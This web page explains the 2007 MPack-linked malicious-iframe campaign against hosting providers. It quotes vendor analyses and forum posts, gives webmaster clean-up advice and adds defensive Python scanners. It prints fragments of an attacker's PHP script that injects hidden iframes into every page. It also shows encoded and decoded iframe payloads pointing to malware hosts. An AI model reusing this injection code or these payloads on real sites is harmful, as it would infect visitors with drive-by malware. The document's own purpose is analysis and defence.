Softpanorama

Malicious iframe attack


In July 2007 there was a new massive hacking attack on web sites. This attack targeted primarily budget Web hosting providers, but it was not limited to them. For example, several sites from HBS were compromised too. SANS has another List Of Compromised Sites.

It looks like the attack usually has two stages.

This attack stresses the fact that Web browsers should now be installed on a VM and used with a special disposable image of Windows. Please consider using Microsoft Virtual PC or VMware and opening a separate instance of the OS for browsing if you have not done so already.

Account passwords harvesting

The best description of the first phase that I found is from Hosting Reviews at Hostjury.com - Blog and is related to Dreamhost. In no way should you consider that Dreamhost was alone. They were just more open about it, and I would give them high credit for that. Most other affected providers tried to sweep the dirt under the carpet.

According to an e-mail sent out to many Dreamhost clientele earlier today there have been over 3,500+ hosting accounts exploited at Dreamhost.

The suspected entry point into the accounts was most likely password sniffing however there are many other rumors surrounding the event.

This exploit quickly followed a recent exploit of IPowerWeb that resulted in the defacement of over 35% of the IPowerWeb clientbase. Earlier this year exploits affected Hostgator & many other large providers whose systems were rooted.

A copy of the e-mail sent out by the dreamhost team is below:

From: DreamHost Security Team
Subject: URGENT: FTP Account Security Concerns…
This email is regarding a potential security concern related to your ‘XXXX’ FTP account.

We have detected what appears to be the exploit of a number of accounts belonging to DreamHost customers, and it appears that your account was one of those affected.

We’re still working to determine how this occurred, but it appears that a 3rd party found a way to obtain the password information associated with approximately 3,500 separate FTP accounts and has used that information to append data to the index files of customer sites using automated scripts (primarily for search engine optimization purposes).

Our records indicate that only roughly 20% of the accounts accessed - less than 0.15% of the total accounts that we host - actually had any changes made to them. Most accounts were untouched.

We ask that you do the following as soon as possible:

Again, only about 20% of the exploited accounts showed any modifications, and of those the only known changes have been to site index documents (ie. ‘index.php’, ‘index.html’, etc - though we recommend looking for other changes as well).

It appears that the same intruder also attempted to gain direct access to our internal customer information database, but this was thwarted by protections we have in place to prevent such access. Similarly, we have seen no indication that the intruder accessed other customer account services such as email or MySQL databases.

In the last 24 hours we have made numerous significant behind-the-scenes changes to improve internal security, including the discovery and patching to prevent a handful of possible exploits.

We will, of course, continue to investigate the source of this particular security breach and keep customers apprised of what we find. Once we learn more, we will be sure to post updates as they become available to our status weblog: http://www.dreamhoststatus.com/

Thank you for your patience. If you have any questions or concerns, please let us know.

Mass modification of site files

In the second stage the pool of harvested passwords is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and that a special tool, called MPACK, was used to install the malicious IFrames. Usually only the main site index documents were targeted (i.e. index.php, index.html, index.shtml, etc.). The malicious IFrames are usually installed at the beginning or at the end of the document; this may be because different versions or modes of MPACK were used. But there are other cases when all documents were modified by replacing the </body> tag [SANS Internet Storm Center]:

After checking where the compromised web sites were hosted, it became clear to us that we were dealing with a mass defacement when a single (or multiple) physical web servers were hosting thousands of web sites.

One of our readers sent us a PHP script he acquired from a compromised web server. The PHP script is pretty simple, and all it does is traverse through the file system and modify all files so that a malicious iframe tag is appended.

Two things were obvious here:

Once attackers found a vulnerable PHP script they first detected the directory hierarchy on the web site. In case of the sample PHP script we received, it looked like this:

  for ($i = 3; $i < 500; $i++) {
      if ($i == 438) continue;
      flush_buffer('<b>/home/sites/site' . $i . '/web</b>:<br>');
      iframe_account(array('/home/sites/site' . $i . '/web'));
  }

From the code snippet above, you can see that all sites have their document root directory set as /home/sites/site[number]/web. The loop creates an array which is then passed to another function called iframe_account().

This function takes every directory and performs a recursive search for 4 file types:

  $file_types = array('php', 'htm', 'html', 'tpl');

It then opens the files and searches for the “</body>” tag which is replaced with the malicious iframe and properly closed:

  $iframed_content = str_replace('</body>', '<iframe src=http://[REMOVED].info/counter style=display:none></iframe></body>', $content);

And voila – a mass compromise happened.

Here is how the Symantec Security Response Weblog describes the tool:

You always thought that by staying clear of the dark alleys of the Internet and visiting only “reputable” websites, you would be safe from attacks and dubious content. I am afraid that is not enough. My colleagues Elia Florio and Hon Lau reported recently (here and here) about legitimate sites that had been compromised to include a malicious IFRAME that, without your knowledge, redirects you to a site serving exploits.

As Elia mentioned, thousands of sites (mostly Italian, but with several other nationalities included) were compromised. We were puzzled as to how the MPack gang had managed to hack so many sites in a short period of time, and how they could inject the malicious iframe so quickly.

The MPack gang appears to be using an IFRAME Manager tool to automate the task on a large scale. This is basically an FTP updater client, written in PHP language, that runs on a webserver with MySQL as back-end. It takes as input a list of website administrator accounts (possibly obtained in the black market). It then periodically checks the home pages of those sites to inject a chosen IFRAME into their code.

This iframe manager is another example of a very user-friendly tool with a clear intent of being resold to multiple hacking groups. As such, it offers a number of interesting features. It allows for the iframe to be injected at the top or bottom of the page and you can use regular expressions when defining the pages to be compromised, such as index[.php|.htm|.html]|default.asp. To maximize the return-on-investment, the tool can check the Google PageRank for the potential websites before injecting the iframe, allowing you to select any number of sites with a certain PageRank in a certain country. Furthermore, the tool can be left running and will cycle through the list of sites and re-inject the iframe, should the pages have been cleaned by the site administrator.

To assist the miscreants in this competitive hacker-eat-hacker world, the tool also allows for the removal of any competitors’ iframes injected in the page. And of course, extensive logs and statistics are provided.

This tool itself however, cannot hack the websites; it relies on a list of compromised credentials to insert the desired iframe into the websites. Therefore a simple clean-up of the page is not sufficient; the site administrator’s credentials need to be changed. To protect yourself as a web surfer, make sure your operating system is up to date with latest patches as well as your anti-virus program.

Posted by Amado Hidalgo on June 19, 2007 11:39 AM

The actual exploit is an encoded IFRAME pointing to the web site with malware.

"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said.

Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec, for instance, asked how hackers were able to infect so many sites in such a short time, and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly.

Pages in hacked web sites are modified using IFRAME to connect to one of many "seed sites" which run scripts that either:

Recommended webmaster reaction to the exploit

  1. Save the hacked index page for further analysis and restore the page from your archive. If you do not have an archive, locate the fragment in the index page and delete it (see below on how to do that).
  2. Change your FTP account password. Most probably it was compromised.
  3. If possible, reconfigure your FTP account to accept connections only from the IP range that you use (if you use DHCP, this can be the IP range of your ISP).
  4. If possible, block access to the sites which provide Web services for the exploit (see below on how to determine them from the encoded string in the exploit).
  5. Search your web pages using grep for strings like "document.write(unescape("
    or any other notable string that you can find on the affected page, for example:
    <script type="text/javascript">
    <!--
    document.write(unescape('%3C%69%66%...'));
    //-->
    </script>

    That gives some assurance that this exploit was used only on the index document of your Web site and was not replicated to other pages.

  6. Install a cron script that periodically searches your Web pages for the string typical of the exploit used ("document.write(unescape(" in the case above), sends you an email if it is found and restores the file(s) in question from the backup.

  7. Check whether your ISP uses the latest version of Apache with security fixes. You can check this using telnet:

    telnet www.mysite.com 80
    12:12
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <HTML><HEAD>
    <TITLE>501 Method
    Not Implemented</TITLE>
    </HEAD><BODY>
    <H1>Method Not Implemented</H1>
    ♥ to /index.h
    tml not supported.<P>
    Invalid method in request \x03<P>
    <HR>
    <ADDRESS>
    Apache/1.3.33
    Server at myhost.myisp.com Port 80</ADDRESS>
    </BODY></HTML>

    Connection to host lost.
    Here you can see that the version of the web server is old. That does not necessarily mean that it is vulnerable, but it is still of some concern (the latest is 1.3.37).

  8. If you have custom scripts it might be prudent to analyze their security.

Decoding the IFRAME content and determining the site with malicious content

The encoded fragment that you have found can be decoded via many sites; for example, you can use HTML & JavaScript Encoder-Decoder. In the case of the exploit listed above the actual code is as follows:

<iframe src="http://fotballportal.info/out.php?s_id=1"
style="visibility: hidden; display: none">
</iframe>

That means that you need to block 203.121.73.33 to increase the chances of avoiding infecting users in case of reinfection.
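An added example (not code from this page or from any of the quoted sources) that implements steps 1, 5 and 6 of the reaction list above together with the decoding just described: it scans a document root for document.write(unescape(...)) fragments and for raw iframes styled invisible, decodes the payload to extract the host that needs blocking, quarantines each modified file and restores it from a backup mirror. The sample pages are constructed; the percent-encoded payload is the one quoted later on this page (the 81.95.146.98 iframe), the host malicious.example.invalid is a placeholder, and the function and directory names are the example's own.

```python
"""Detect, decode and clean the iframe injections described on this page.

Added example, not from the page or any quoted source. Sample files and the
placeholder host malicious.example.invalid are constructed; the percent-encoded
payload is the one quoted later on this page (the 81.95.146.98 iframe).
"""
import os
import re
import shutil
import tempfile
from urllib.parse import unquote, urlsplit

# document.write(unescape('%3C%69%66...')) as injected into index documents
INJECT_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*['\"]([^'\"]*)['\"]\s*\)\s*\)", re.I)
IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
SCAN_EXTENSIONS = {".php", ".htm", ".html", ".shtml", ".tpl"}  # types the SANS script hit

# Encoded fragment quoted on this page (Ethan Zuckerman's friend's index page)
PAGE_PAYLOAD = (
    "%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34"
    "%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D"
    "%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72"
    "%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69"
    "%66%72%61%6D%65%3E")


def decode_payload(encoded):
    """Emulate JavaScript unescape(): %uXXXX first, then %XX."""
    encoded = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), encoded)
    return unquote(encoded, errors="replace")


def iframe_hosts(html, hidden_only):
    """Hosts of iframe src attributes in html; optionally only invisible iframes."""
    hosts = []
    for tag in IFRAME_TAG_RE.finditer(html):
        if hidden_only and not HIDDEN_RE.search(tag.group(0)):
            continue
        src = SRC_RE.search(tag.group(0))
        if src:
            hosts.append(urlsplit(src.group(1)).hostname or src.group(1))
    return hosts


def find_injections(text):
    """Hosts loaded by (a) any iframe inside a document.write(unescape()) payload
    and (b) raw iframes styled invisible (the str_replace('</body>') variant)."""
    hosts = []
    for m in INJECT_RE.finditer(text):
        hosts += iframe_hosts(decode_payload(m.group(1)), hidden_only=False)
    hosts += iframe_hosts(text, hidden_only=True)
    return hosts


def scan_tree(web_root):
    """Map each infected file (path relative to web_root) to the hosts it loads."""
    report = {}
    for dirpath, _, names in os.walk(web_root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hosts = find_injections(fh.read())
            if hosts:
                report[os.path.relpath(path, web_root)] = hosts
    return report


def restore_from_backup(web_root, backup_root, report, quarantine_dir):
    """Keep a copy of each modified file for analysis (step 1), then overwrite it
    with the clean copy from the backup mirror (step 6). Files without a backup
    are returned separately so the fragment can be removed by hand."""
    os.makedirs(quarantine_dir, exist_ok=True)
    restored, no_backup = [], []
    for rel in report:
        infected = os.path.join(web_root, rel)
        shutil.copy2(infected, os.path.join(quarantine_dir, rel.replace(os.sep, "_")))
        clean = os.path.join(backup_root, rel)
        if os.path.isfile(clean):
            shutil.copy2(clean, infected)
            restored.append(rel)
        else:
            no_backup.append(rel)
    return restored, no_backup


def _write(path, text):
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Constructed document root: two infected pages, one clean page, one backup."""
    base = tempfile.mkdtemp()
    web, backup, quarantine = (os.path.join(base, d) for d in ("web", "backup", "quarantine"))
    os.makedirs(os.path.join(web, "blog"))
    os.makedirs(backup)
    clean = "<html><body><h1>Welcome</h1></body></html>\n"
    unescape_inject = ("<script type=\"text/javascript\">\n<!--\ndocument.write(unescape('"
                       + PAGE_PAYLOAD + "'));\n//-->\n</script>\n")
    # appended raw iframe, as produced by the PHP str_replace('</body>') script (placeholder host)
    body_inject = clean.replace(
        "</body>", "<iframe src=http://malicious.example.invalid/counter style=display:none></iframe></body>")
    _write(os.path.join(web, "index.html"), unescape_inject + clean)  # infected, backup exists
    _write(os.path.join(backup, "index.html"), clean)
    _write(os.path.join(web, "blog", "index.php"), body_inject)       # infected, no backup
    _write(os.path.join(web, "about.html"), clean)                    # untouched
    _write(os.path.join(web, "logo.png"), "binary, not scanned")
    report = scan_tree(web)
    restored, no_backup = restore_from_backup(web, backup, report, quarantine)
    return report, restored, no_backup, scan_tree(web)


if __name__ == "__main__":
    before, restored, no_backup, after = demo()
    for rel, hosts in before.items():
        print(f"{rel}: block {', '.join(hosts)}")
    print("restored:", restored, "manual cleanup:", no_backup, "still infected:", after)
```

Run from cron against the real document root and backup mirror and mail the printed report; hosts it lists are the ones to block at the firewall or in the hosts file.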

Recommendations for ISPs

ISPs which do not provide users with shell access might be hurt if such attacks become recurrent, as this is in essence an attack on the business model of cheap, reliable hosting, where part of the reliability is achieved by not providing ssh access to users.

 I would propose several steps that can compensate for the lack of shell access:
  1. It is unclear how they harvest passwords, and finding the answer to this question is of paramount importance. If user passwords are stored in the clear, you should consider adopting an encoding scheme.
  2. One of the problems is the weakness of VDECK as software, for those ISPs which use it (I have no experience with Cpanel).
  3. Provide users with several "precooked" cron scripts.
  4. It looks like the attack targets Apache, so there might be a need to revise and improve the Apache configuration to make it more resistant to attacks. As Sophos mentions in its blog entry Mal-ObfJS-C Where When:

    Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found delivering the malicious IFRAMES code, and found that the overwhelming majority -- 98 percent to be exact -- were running the Apache Web server. "The servers targeted in this attack have almost exclusively been running some flavor of Apache on Unix," said Sophos in a blog entry <http://www.sophos.com/security/blog/2007/06/250.html> Friday.

    That might be just a side effect of the fact that this attack targeted budget ISPs.


Old News ;-)

[Aug 11, 2010] Zombies with php files scanners installed of the day ;-)


[Jul 31, 2010] Top zombies with php files scanners installed for July 2010


[Jun 28, 2007] Mal-ObfJS-C Where When

"... the servers targeted in this attack have almost exclusively been running some flavour of Apache on Unix."

22 June 2007 11:42 GMT

For the past 7 weeks SophosLabs have been tracking an attack targeting sites all over the world. In the attack, legitimate sites have been compromised so that they serve up a malicious JavaScript (Mal/ObfJS-C). In this post, I present a brief summary of the data obtained thus far.

Since May 1st, we have found 3,896 URLs that have been compromised, over 1,627 different domains. The subject matter of the hacked sites covers as wide a range of topics as you can imagine. Clothes boutiques, driving instruction, nude beauty pageants, celebrity gossip, hypnotherapy through to handmade musical instruments. Most worryingly, there are some fairly popular sites within the list, including a fairly large bank (this site was hacked last week). Taking a deeper look at the data, we can gather further information about this campaign.

As you can see from the following graph (note the log scale on the y-axis), the vast bulk of the compromised pages are being served up from sites in the United States, closely followed by Brazil, Canada and the UK.

Countries hosting Mal/ObfJS-C

It should be noted this data is based on the country in which the host web server resides - it does not indicate the locale of the site itself. For example, several ‘.co.uk’ domains were found to be hosted within the US.

To get a true impression of the scale of such an attack, looking at domain names alone is insufficient. We have encountered previous cases where initial data based on a plethora of compromised domains has suggested a large campaign, only to find that they all were as the result of the hacking of a handful of boxes within a single service provider (Troj/EncIfr-A for example). Looking at this data from an IP perspective reveals 324 unique IP addresses, the bulk of which are hosting a low number of compromised sites.

Number of compromised domains per server IP

As might be expected, we can see that in several cases, once the hackers have managed to hack a server, they have compromised several sites hosted there.

Probing further, we can try to identify the operating system and web server application. As you can see below, the servers targeted in this attack have almost exclusively been running some flavour of Apache on Unix.

Web server types hosting Mal/ObfJS-C

Though we cannot deduce the method employed by the hackers to compromise the servers, such data is nonetheless interesting. Gathering and analysis of such data provides us with valuable information to assist in the fight against web attacks. As ever, it is imperative that web servers are maintained and patched to the latest level. If you outsource the responsibility of this to your ISP, ensure they follow good practice. Remember, their failure could lead to your loss of credibility if it is your site that gets hacked into a malicious drive-by.

Fraser, SophosLabs UK

script added to my site (not by me)

Typical reaction after discovery of the imbedded iframe.

    Could someone help me out and tell me what this is:
    <html>
    <body>
    <script>
    document.write(unescape("%3c..."));
    </script>
    </body>
    </html>

Strange mix-up in Thunderbird - mozilla.support.thunderbird Google Groups

Nir wrote:
> Andrés M. wrote:
>> Hello, This morning I opened Thunderbird and went to the m.s.firefox
>> newsgroup. I clicked first on the mail with subject "Could this
>> exploit code from a malware site affect Firefox?" and while the mail
>> window was blank and still loading I immediately clicked on the mail
>> with subject "Really really really annoying and persistent display
>> problem...". Almost instantly the latter mail was on screen. Then
>> clicked on the Back button to see the first mail and what I got was a
>> mix of the first half of the first mail with the full content of the
>> second mail (including header) appended below. The resulting content
>> is pasted at the end of this mail. The header of the second mail may
>> be a little different, I copied it manually from an exported text
>> file of the second mail. Look for the word "unescaping" to reach the
>> point where both mails got mixed.

>> I am unable to reproduce this strange event again, but it definitely
>> happened so I wonder if someone can take a look at it.

> either an extension is causing this -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=370473#c0"
> or it's the theme, you are using , which is misbehaving -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c36"
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c23"
Oops, sorry I forgot to mention but I'm using Thunderbird 2.0.0.4
completely clean, no extra themes and no add-ons except "Talkback" which
comes with the installer.

Thanks for your reply, but add-ons are certainly not the cause.

Could this exploit code from a malware site affect Firefox - mozilla.support.firefox Google Groups


Newsgroups: mozilla.support.firefoxFrom: Chris Jahn <clj...@netscape.net.invalid>

Date: Sun, 24 Jun 2007 22:00:23 -0500

Local: Sun, Jun 24 2007 11:00 pm

Subject: Re: Could this exploit code from a malware site affect Firefox?

"OMA" <omol...@inicia.es> wrote in
news:qfqdnQjMOOgmsOLbnZ2dnUVZ_rCsnZ2d@mozilla.org:

> I'd like to know if that code could exploit any vulnerability
> in Firefox, and thus if it may have affected my system.

No. In IE, clicking on the executable would run it. In FF, you
can only download an executable file, then you have to browse to
the saved file and click it yourself, manually.

--
Mozilla & Netscape FAQs: http://www.ufaq.org/
Mozilla/Firefox/Thunderbird/Seamonkey solutions: http://ilias.ca/
Web page validation: http://validator.w3.org
About Mozilla: http://www.mozilla.org

Ambition is a poor excuse for not having the good sense to be
lazy.

Newsgroups: mozilla.support.firefox

From: Aggro <spammerdr...@yahoo.com>

Date: Mon, 25 Jun 2007 17:48:44 +0300

Local: Mon, Jun 25 2007 10:48 am

Subject: Re: Could this exploit code from a malware site affect Firefox?


OMA wrote:
> Hello, I've accidentally entered a malware site by following an e-mail link
> to www.duhymn.hk (be careful NOT to enter that site with a browser).
> When I entered the site with Firefox 2.0.0.4, the browser immediately
> froze.

There seems to be a large loop. That probably caused your browser to
freeze. Freezing is not an indication that they managed to do something to
your computer.

It looks like "Internet Explorer createControlRange Object Buffer Overflow":
http://www.juniper.net/security/auto/vulnerabilities/vuln1850.html

So probably only IE users are in danger. I didn't read the whole code,
so I don't know if there is something else also. But I very much doubt
that you would be in danger as you were using 2.0.0.4.

--
Solutions for issues with Firefox:
http://kb.mozillazine.org/Category:Issues_%28Firefox%29

CastleCops® omega-it.ru

WOW this is ALL from omega-it.ru, Wow I feel sorry for that computer network.
We got warezov and zhelatin and nuwar, ircbot, magnoia, and lineage, spys and bankers and a few sdbots. wow just from one computer network

The new malware ecology

Ethan Zuckerman has a fascinating story about how contemporary malware works.

It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn’t connect him to her site and flashed up the warning “This site may harm your computer”. It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of protesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend’s behalf…

Within half an hour, three of my colleagues pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:

<script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E'
) );

That’s some seriously obfuscated Javascript. But if you translate from hexadecimal to ASCII, the code’s pretty clear - it inserts the following code into the top of the HTML page:

<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page - iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser - the server is apparently refusing connections, at least from my Macintosh - but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters - the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama - some antispammers believe that RBusiness is short for “Russian Business Network“, which was evidently their previous operating name.

Googling for the specific IP - 81.95.146.98 - turns up a couple of pages with people documenting an interesting exploit - the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install - Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware - Trojan-PSW.Win32.Small.bs - which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.

Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.

Netcraft IFRAME Exploit Spreading Through Banner Ads

Banner ads appearing on popular European web sites have been directing traffic to sites that install malware on visitors' computers, according to the Internet Storm Center. The attacks are exploiting an unpatched flaw in the way Internet Explorer 6 handles the IFRAME tag.

"Some high profile sites with banner ads are linking to servers that have the exploit and malicious code," according to an advisory on the ISC web site. The attack is an expanded version of banner-based exploits that first surfaced earlier this year. Banner networks, with their ability to place code on hundreds of outside sites, offer a vehicle for the rapid distribution of trojans and other malware, as well as a way to deface web pages. It is not clear whether the malicious code was being spread through a compromised ad server, or through specific banners submitted to ad networks.

Site operators are being cautioned to verify that the banners do not contain the IFRAME exploit code, or failing that, temporarily disable banner ads to minimize the risk of accidentally infecting users and propagating the exploit. The ISC did not identify any of the affected sites.

Users clicking on the banners are being infected with variants of the Bofra worm that has been propagating through e-mail and malicious web sites. Bofra appeared just days after the revelation of the IFRAME vulnerability, which affects Internet Explorer 6 on all Windows platforms except Windows XP Service Pack 2 (SP2). This vulnerability allows attackers to gain complete control of a user's computer.

How can I protect against malicious iFrames - CNET Viruses & security alerts Forums

on-line linkscanner:
http://linkscanner.explabs.com/linkscanner/default.asp

But the best you could do:
For home users:
* Beware of pages that require software installation. Do not allow new software installation from your browser unless you absolutely trust both the Web page and the provider of the software.
* Scan any program downloaded through the Internet with updated antivirus and anti-spyware software. This includes any downloads from P2P networks, through the Web and from any FTP server, regardless of the source.
* Beware of unexpected strange-looking emails, regardless of their sender. Never open attachments or click on links contained in these email messages.
* Enable the “Automatic Update” feature in your Windows operating system and apply new updates as soon as they are available.
* Always have an antivirus real-time scan service. Monitor regularly that it is being updated and that the service is running.
* Free security tools are available at www.trendmicro.com
http://us.trendmicro.com/us/about/news/pr/article/20070618185040.html

Computerworld - Porn sites serve up Mpack attacks

Several hundred pornography sites are surprising unwitting users with a smorgasbord of exploits via Mpack, the already notorious hacker toolkit that launched massive attacks earlier this week from a network of more than 10,000 compromised domains.

Trend Micro has spotted nearly 200 porn domains -- most dealing in incestuous content -- that have either been hacked or are purposefully redirecting users to servers hosting Mpack, a professional, Russian-made collection of exploits that comes complete with a management console.

Even though there are far fewer porn sites in this newly discovered infection chain than in Monday's "Italian Job" attack -- called that because most of the 10,000+ hijacked sites were legitimate Italian domains -- they've managed to infect twice as many end-users' PCs, said Trend Micro in a posting to its malware blog.

"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said.

Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec, for instance, asked how hackers were able to infect so many sites in such a short time, and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly.

"The MPack gang appears to be using an IFRAME manager tool to automate the task on a large scale," said Amado Hidalgo, a Symantec security analyst. The tool, which Hidalgo said was basically an FTP updater using MySQL as a back-end database, regularly checks a large list of sites to inject the malicious IFRAME code.

Hidalgo also spelled out how hackers have been getting into legitimate sites, which puzzled investigators earlier this week. "It takes as input a list of Web site administrator accounts, possibly obtained in the black market," he said. Those administrator accounts are recorded in MySQL, and the manager can be left running so that it re-infects sites that have been purged of the IFRAMES code. "A simple clean-up of the page is not sufficient," advised Hidalgo. "The site administrator's credentials need to be changed."

Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found delivering the malicious IFRAMES code, and found that the overwhelming majority -- 98 percent to be exact -- were running the Apache Web server. "The servers targeted in this attack have almost exclusively been running some flavor of Apache on Unix," said Sophos in a blog entry Friday. That's not always the case, said Ron O'Brien, senior security analyst at Sophos. "Overall, hacked sites are about evenly split between Apache and [Microsoft] IIS servers, but in this subset it's almost entirely Apache." Another interesting factoid, said O'Brien: "Of all the sites we've tracked that serve malicious code, about 80 percent have been hacked."

Still other researchers rooted out details of Mpack, including its price and the nom-de-plume of its creator. Ken Dunham, director of VeriSign-iDefense's rapid response team, said Mpack sells for around US$1,000, and that the man [or woman] behind it goes by "$ash" in the Russian hacker underground. The latest version of Mpack, .90, includes exploits for eight different vulnerabilities, six of them flaws in Windows or Internet Explorer, including the dangerous ANI bug that affected Vista earlier this year.

"This is a powerful Web exploitation tool," Dunham said.
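Both the Netcraft item above (site operators asked to verify that banners do not carry iframe exploit code) and the Symantec analysis quoted from Computerworld (an automated tool injecting iframes into legitimate pages and re-injecting them after clean-up) call for the same defender-side check: a periodic scan of the served HTML for iframes that a site owner never put there. The following is an added example written for this page, not code from Netcraft, Symantec, Sophos, Trend Micro or any other source quoted here. It assumes a hypothetical allowlist of the site's own hosts (`ALLOWED_HOSTS`) and uses two heuristics typical of injected iframes: the frame points at a host outside that allowlist, and it is made invisible (1x1 size, `display:none`, `visibility:hidden`, or positioned far off-screen). The sample page is constructed; the 203.0.113.x address is from the documentation range and stands for whatever external server an injected frame would load.

```python
"""Flag iframes that look injected into a site's own HTML.

Added example for this page (not from any quoted source). The allowlist,
sample page and hostnames are hypothetical / constructed.
"""
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately frames content from (assumption: edit per site).
ALLOWED_HOSTS = {"www.example-site.test", "static.example-site.test"}


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attrs is a list of (name, value); value is None for bare attrs
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _px(value):
    """Leading integer of a width/height attribute ('1', '1px', '300')."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def is_hidden(attrs):
    """True if the iframe is sized or styled so a visitor would not see it."""
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    if w is not None and h is not None and (w <= 1 or h <= 1):
        return True
    style = attrs.get("style", "").lower().replace(" ", "")
    if "display:none" in style or "visibility:hidden" in style:
        return True
    # off-screen placement such as left:-5000px or top:-9999px
    return re.search(r"(left|top):-\d{3,}px", style) is not None


def is_external(src):
    """True if src names a host outside ALLOWED_HOSTS (relative URLs are local)."""
    host = urlparse(src).hostname
    return host is not None and host.lower() not in ALLOWED_HOSTS


def find_suspicious_iframes(html):
    """Return [(src, [reasons])] for iframes that are external and/or hidden."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for a in parser.iframes:
        src = a.get("src", "")
        reasons = []
        if is_external(src):
            reasons.append("external-src")
        if is_hidden(a):
            reasons.append("hidden")
        if reasons:
            findings.append((src, reasons))
    return findings


def scan_web_root(root):
    """Walk a document root and map file path -> findings for HTML files."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm", ".php", ".shtml")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_suspicious_iframes(fh.read())
                if hits:
                    report[path] = hits
    return report


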